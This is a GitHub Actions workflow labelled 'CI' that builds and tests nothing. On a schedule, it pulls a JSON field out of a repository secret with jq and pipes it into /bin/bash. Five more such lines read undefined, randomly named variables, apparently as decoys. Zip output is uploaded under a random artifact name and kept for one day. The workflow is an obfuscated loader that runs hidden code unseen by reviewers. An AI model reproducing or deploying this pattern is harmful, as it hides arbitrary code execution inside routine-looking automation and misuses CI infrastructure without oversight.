name: CI
on:
  workflow_dispatch:

  schedule:
    - cron: '25 2,8,14,20 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  agent:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Perform
        env:
          tpq9: ${{ secrets.tpq9 }}
        run: |
          printf '%s' "$tpq9" | jq -r .kyxp5628 | /bin/bash
          printf '%s' "$fyx5714" | jq -r .lh423 | /bin/bash
          echo $v3 | jq -r .xa614 | /bin/bash
          echo $rjxnu51797 | jq -r .hknkj299 | /bin/bash
          printf '%s' "$wvuo43052" | jq -r .mb7 | /bin/bash
          printf '%s' "$xxw29" | jq -r .tcz971 | /bin/bash

      - name: Upload results
        uses: actions/upload-artifact@v4
        with:
          name: 2QlWg3AV
          path: "*.zip"
          retention-days: 1
